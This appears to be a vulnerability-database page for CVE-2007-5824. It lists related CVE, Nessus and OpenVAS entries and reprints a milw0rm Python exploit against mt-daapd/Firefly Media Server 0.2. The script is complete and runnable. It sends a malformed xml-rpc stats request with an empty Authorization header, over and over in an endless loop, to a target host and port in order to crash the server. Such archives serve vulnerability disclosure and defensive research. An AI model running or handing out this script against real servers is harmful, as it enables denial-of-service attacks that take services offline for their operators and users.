Remote Denial of Service attack on Firefly Media Server 0.2.
Reporter | Title | Published | Views | Family All 21 |
---|---|---|---|---|
CVE | CVE-2007-5824 | 5 Nov 200719:46 | – | cve |
Prion | Authorization | 5 Nov 200719:46 | – | prion |
Cvelist | CVE-2007-5824 | 5 Nov 200719:00 | – | cvelist |
NVD | CVE-2007-5824 | 5 Nov 200719:46 | – | nvd |
Tenable Nessus | FreeBSD : mt-daapd -- denial of service vulnerability (a7080c30-91a2-11dc-b2eb-00b0d07e6c7e) | 14 Nov 200700:00 | – | nessus |
Tenable Nessus | GLSA-200712-18 : Multi-Threaded DAAP Daemon: Multiple vulnerabilities | 31 Dec 200700:00 | – | nessus |
Tenable Nessus | Debian DSA-1597-2 : mt-daapd - multiple vulnerabilities | 16 Jun 200800:00 | – | nessus |
OpenVAS | FreeBSD Ports: mt-daapd | 4 Sep 200800:00 | – | openvas |
OpenVAS | FreeBSD Ports: mt-daapd | 4 Sep 200800:00 | – | openvas |
OpenVAS | Gentoo Security Advisory GLSA 200712-18 (mt-daapd) | 24 Sep 200800:00 | – | openvas |
#!C:\python25\python25.exe
"""
Advisory : [UPH-07-02]
mt-dappd/Firefly media server remote DoS
Discovered by nnp
http://www.unprotectedhex.com
"""
import sys
import socket
import time
if len(sys.argv) != 3:
sys.exit(-1)
kill_msg = """GET /xml-rpc?method=stats HTTP/1.1\r\n
Authorization:\r\n\r\n"""
host = sys.argv[1]
port = sys.argv[2]
print '[+] Host : ' + host
print '[+] Port : ' + port
print "[+] Sending "
print kill_msg
ctr = 1
while 1:
print '[+] Ctr : ' + str(ctr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, int(port)))
s.send(kill_msg)
s.close()
ctr += 1
# milw0rm.com [2007-11-02]
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo